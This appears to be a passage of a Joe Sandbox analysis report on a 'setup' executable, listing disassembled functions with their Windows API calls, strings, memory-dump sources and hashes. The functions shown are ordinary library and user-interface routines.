                                                                                                                          • Opcode ID: 03989a20da529a71bcb4dbd022f7bebe0f286383fae040c82e2e04c3377a7e98
                                                                                                                          • Instruction ID: f8dd7f61a2f9c18b25b845055ae7935402e5b8f306270f48a77a0802fe1a5808
                                                                                                                          • Opcode Fuzzy Hash: 03989a20da529a71bcb4dbd022f7bebe0f286383fae040c82e2e04c3377a7e98
                                                                                                                          • Instruction Fuzzy Hash: C3119131640304EFDB215B78DC49B9F77E8AF51304F14042AE496A21A1DBB1E954DB61
                                                                                                                          Function 00C40A61 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39D7C,?,?,?,?), ref: 00C40A73
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 00C40A83
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,00C39D7C,?,?,?,?), ref: 00C40A8C
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C39D7C,?,?,?,?), ref: 00C40A9A
                                                                                                                          Strings
                                                                                                                          • RegisterApplicationRecoveryCallback, xrefs: 00C40A7D
                                                                                                                          • kernel32.dll, xrefs: 00C40A6E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: RegisterApplicationRecoveryCallback$kernel32.dll
                                                                                                                          • API String ID: 2061474489-202725706
                                                                                                                          • Opcode ID: 46f98e101aaafdcf8d8c787a4f3c6941832d320c30aca6c4103f9693a0f06896
                                                                                                                          • Instruction ID: b1f584df20dc17ecdafe4583b8bb6cabc8ee7fd8bfe733ca3aa74085e1eeebeb
                                                                                                                          • Opcode Fuzzy Hash: 46f98e101aaafdcf8d8c787a4f3c6941832d320c30aca6c4103f9693a0f06896
                                                                                                                          • Instruction Fuzzy Hash: BAF0543564075ABF8F119F65EC0CB5D3FA9BB087903108021FE05E62A0DB34CD10AFA0
                                                                                                                          Function 00C40BEF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(comctl32.dll), ref: 00C40C01
                                                                                                                          • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00C40C11
                                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00C40C1A
                                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 00C40C28
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: TaskDialogIndirect$comctl32.dll
                                                                                                                          • API String ID: 2061474489-2809879075
                                                                                                                          • Opcode ID: f4df639ef8d494d9eae09d7f952e116398e2347b90d205c9c92782f5231e461a
                                                                                                                          • Instruction ID: 66a742dca3fc467008c246c9adf97936c79c4a36a40f16e72c67809d99cf0eb2
                                                                                                                          • Opcode Fuzzy Hash: f4df639ef8d494d9eae09d7f952e116398e2347b90d205c9c92782f5231e461a
                                                                                                                          • Instruction Fuzzy Hash: A3F03035580215FB8B111FA4ED8CB5E3E68BB087A17100625FE09E2270DB35CD109AA5
                                                                                                                          Function 00C40B8A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C40B9C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00C40BAC
                                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00C40BB5
                                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 00C40BC3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                          • API String ID: 2061474489-2936008475
                                                                                                                          • Opcode ID: 676417eb88b9dbb82f72f519f231d7d20c878db88074216b7319826fb9597bae
                                                                                                                          • Instruction ID: 6f4f880073b75d4a390ee2e19517a765b3cc574d015c29fa4e4dc290752e0b69
                                                                                                                          • Opcode Fuzzy Hash: 676417eb88b9dbb82f72f519f231d7d20c878db88074216b7319826fb9597bae
                                                                                                                          • Instruction Fuzzy Hash: 55F03A35685215EB8F121F61ED0CF6E3AA8FB087997108026FE05E22A0DB34CD119BE8
                                                                                                                          Function 00C40B25 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(shell32.dll,?,?,00C35E3E,?,00000000,00C99BB4,00C3610C), ref: 00C40B37
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00C40B47
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00C35E3E,?,00000000,00C99BB4,00C3610C), ref: 00C40B50
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C35E3E,?,00000000,00C99BB4,00C3610C), ref: 00C40B5E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                          • API String ID: 2061474489-2320870614
                                                                                                                          • Opcode ID: ce092a74d628c2b7c5c17500e1b87d440a1ac78e5e750d217daa5b420e396dad
                                                                                                                          • Instruction ID: 0c254c53700d990ce587da19c6b27f911081af60f625cb82c116d9ae7516ef29
                                                                                                                          • Opcode Fuzzy Hash: ce092a74d628c2b7c5c17500e1b87d440a1ac78e5e750d217daa5b420e396dad
                                                                                                                          • Instruction Fuzzy Hash: 0FF03032580215FB8B111F65EC0CF5E3B68FB087A93104121FE01E2270DB30CE409AA8
                                                                                                                          Function 00C40AC6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39D60,?,?), ref: 00C40AD8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 00C40AE8
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,00C39D60,?,?), ref: 00C40AF1
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C39D60,?,?), ref: 00C40AFF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: RegisterApplicationRestart$kernel32.dll
                                                                                                                          • API String ID: 2061474489-1259503209
                                                                                                                          • Opcode ID: b422daea6aa32ec6980c2fccde813fd1edf2a4b8f179ae3d3c1f2b8cddee7ddc
                                                                                                                          • Instruction ID: 8b00c58f39652ffff06e33bcee53ecf7017573ed128a0275dfeb323e57d65ac3
                                                                                                                          • Opcode Fuzzy Hash: b422daea6aa32ec6980c2fccde813fd1edf2a4b8f179ae3d3c1f2b8cddee7ddc
                                                                                                                          • Instruction Fuzzy Hash: 18F01235680759BB8B115B65FC0CF5D7FA8FB047953104126FD05E6261DB34CD419AA4
                                                                                                                          Function 00C40720 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39510,00000000), ref: 00C40732
                                                                                                                          • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 00C40742
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,00C39510,00000000), ref: 00C4074B
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C39510,00000000), ref: 00C40759
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: ApplicationRecoveryInProgress$kernel32.dll
                                                                                                                          • API String ID: 2061474489-2899047487
                                                                                                                          • Opcode ID: 8885d55924cbb106c8a345399bc984b6b366f10b50cc56b4ee73b14d77a8556d
                                                                                                                          • Instruction ID: 3c95671af2f3e5aa714982002772da76f6ea162b7e13ef04853ecc2c1ee61269
                                                                                                                          • Opcode Fuzzy Hash: 8885d55924cbb106c8a345399bc984b6b366f10b50cc56b4ee73b14d77a8556d
                                                                                                                          • Instruction Fuzzy Hash: 5BF06C35981761EF8B111B75BC4CB6D3B98BB087E63140526FE05E32A0DB74ED405EE5
                                                                                                                          Function 00C406CB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39553,00000001), ref: 00C406DD
                                                                                                                          • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 00C406ED
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00C39553,00000001), ref: 00C406F6
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C39553,00000001), ref: 00C40704
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: ApplicationRecoveryFinished$kernel32.dll
                                                                                                                          • API String ID: 2061474489-1962646049
                                                                                                                          • Opcode ID: f33a21666743dc074741dd3a6735cdf5bf6376233cc6dc633fe7922152980cbe
                                                                                                                          • Instruction ID: 525cc779469fbad27577c4642f8592cef405d476ce22ec2ace061db3aead91ce
                                                                                                                          • Opcode Fuzzy Hash: f33a21666743dc074741dd3a6735cdf5bf6376233cc6dc633fe7922152980cbe
                                                                                                                          • Instruction Fuzzy Hash: 7CF06531641715AB8B112B74FD0CF1D7BACBB087953004122FD06E22A1DB34DE008EA2
                                                                                                                          Function 00C409C4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(shell32.dll,00000000,00C2F1FA), ref: 00C409D3
                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitNetworkAddressControl), ref: 00C409E3
                                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00C409EC
                                                                                                                          • DecodePointer.KERNEL32(00000000,00000000,00C2F1FA), ref: 00C409FA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: InitNetworkAddressControl$shell32.dll
                                                                                                                          • API String ID: 2061474489-1950653938
                                                                                                                          • Opcode ID: 261e07cdd626f23ae30ab7032326f0da69e8286d72dcf62fb34741105d848b0b
                                                                                                                          • Instruction ID: 72e2239b8ac4baa3c65f0c27f072a2dc94e6ccbc0372af89683507bb28cb77ce
                                                                                                                          • Opcode Fuzzy Hash: 261e07cdd626f23ae30ab7032326f0da69e8286d72dcf62fb34741105d848b0b
                                                                                                                          • Instruction Fuzzy Hash: 69E01231A41725AF9B116B70BC0CB5E3A58BB087953154567F901E21A6EB34CD019BA4
                                                                                                                          Function 00C40A16 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(comctl32.dll), ref: 00C40A25
                                                                                                                          • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00C40A35
                                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00C40A3E
                                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 00C40A50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: TaskDialogIndirect$comctl32.dll
                                                                                                                          • API String ID: 2061474489-2809879075
                                                                                                                          • Opcode ID: fa6125fdafbb6bc18e22d8f601f42c7df9f9a4295e856cc147cf1aee78583304
                                                                                                                          • Instruction ID: 2342c2d3d2fcbe792dcf61513fda187fb4c386a19bdc5c9687f70f850e4d31b8
                                                                                                                          • Opcode Fuzzy Hash: fa6125fdafbb6bc18e22d8f601f42c7df9f9a4295e856cc147cf1aee78583304
                                                                                                                          • Instruction Fuzzy Hash: FAE08675641761AF8B509B74BD0CB5E3AD8BF087E13118D72FD05E31A0EB38DD00A6A4
                                                                                                                          Function 00C3DE9A Relevance: 10.5, APIs: 7, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00C3DE9F
                                                                                                                          • GetSysColor.USER32(00000010), ref: 00C3DEAA
                                                                                                                          • GetSysColor.USER32(00000014), ref: 00C3DEB5
                                                                                                                          • GetSysColor.USER32(00000012), ref: 00C3DEC0
                                                                                                                          • GetSysColor.USER32(00000006), ref: 00C3DECB
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00C3DED6
                                                                                                                          • GetSysColorBrush.USER32(00000006), ref: 00C3DEE1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$Brush
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2798902688-0
                                                                                                                          • Opcode ID: f27b13f8a1b7bfdff1764e76b078473c5372e96abe7f257b1a5552f77900474a
                                                                                                                          • Instruction ID: 6ad01a2aab6db03b020a2c41b979f519469709e228d8b1d53dda29d617d0dba6
                                                                                                                          • Opcode Fuzzy Hash: f27b13f8a1b7bfdff1764e76b078473c5372e96abe7f257b1a5552f77900474a
                                                                                                                          • Instruction Fuzzy Hash: 74F098729407009BD720AFB1AD4D74A7EA0BB08711F01492AF2868BAE4E7B7A041DF00
                                                                                                                          Function 00C19BC1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 23synchronizationsleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000001,AFX_AUTOUPDATE_200405172224), ref: 00C19BCD
                                                                                                                          • GetLastError.KERNEL32 ref: 00C19BD9
                                                                                                                          • ReleaseMutex.KERNEL32(?), ref: 00C19BF1
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C19BFD
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C19C0F
                                                                                                                          Strings
                                                                                                                          • AFX_AUTOUPDATE_200405172224, xrefs: 00C19BC4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Mutex$CloseCreateErrorHandleLastReleaseSleep
                                                                                                                          • String ID: AFX_AUTOUPDATE_200405172224
                                                                                                                          • API String ID: 1326836876-1720553081
                                                                                                                          • Opcode ID: 29f2804ccf9a1c73c23753760f1500b39bcdbd3a5d11655355a857667fa6c54b
                                                                                                                          • Instruction ID: 9dcc1c1fff85a4aaa41111939849b2208da375c83538b4bd8f457be907ac3ca6
                                                                                                                          • Opcode Fuzzy Hash: 29f2804ccf9a1c73c23753760f1500b39bcdbd3a5d11655355a857667fa6c54b
                                                                                                                          • Instruction Fuzzy Hash: 9FE0E530645712EBF7205B71EC6DFAA36A5FB01712F10496AF05AD61E0CBB5A8809F60
                                                                                                                          Function 00C85B08 Relevance: 9.2, APIs: 6, Instructions: 248COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCPInfo.KERNEL32(00000002,00000000,00C09A5E,7FFFFFFF,00000002,00C85DD8,00000002,00000002,?,00000000,?,?,?,?,00000000,?), ref: 00C85BAE
                                                                                                                          • __freea.LIBCMT ref: 00C85D43
                                                                                                                          • __freea.LIBCMT ref: 00C85D49
                                                                                                                          • __freea.LIBCMT ref: 00C85D7F
                                                                                                                          • __freea.LIBCMT ref: 00C85D85
                                                                                                                          • __freea.LIBCMT ref: 00C85D95
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __freea$Info
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 541289543-0
                                                                                                                          • Opcode ID: 5bea27d19bd7ce6671cb202437407813c8b5992ea1aa1952362c4882bc8c022e
                                                                                                                          • Instruction ID: 3177d523e99060025639b28e7d1dfa0c956560978dd47540477a7650acf09c43
                                                                                                                          • Opcode Fuzzy Hash: 5bea27d19bd7ce6671cb202437407813c8b5992ea1aa1952362c4882bc8c022e
                                                                                                                          • Instruction Fuzzy Hash: 50711772900A05ABDF21BE54CD45FBF7BF9AF49318F28045AFC24A7281E7B59D009768
                                                                                                                          Function 00C2515A Relevance: 9.1, APIs: 6, Instructions: 146COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C24D9B: GetDC.USER32(00000000), ref: 00C24DA7
                                                                                                                            • Part of subcall function 00C24D9B: GetDeviceCaps.GDI32(00000000,00000058), ref: 00C24DB6
                                                                                                                            • Part of subcall function 00C24D9B: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C24DC4
                                                                                                                            • Part of subcall function 00C24D9B: ReleaseDC.USER32(00000000,00000000), ref: 00C24DD2
                                                                                                                          • MulDiv.KERNEL32(00000037,?,00000060), ref: 00C2517A
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00C251BA
                                                                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00C251DF
                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00C2522A
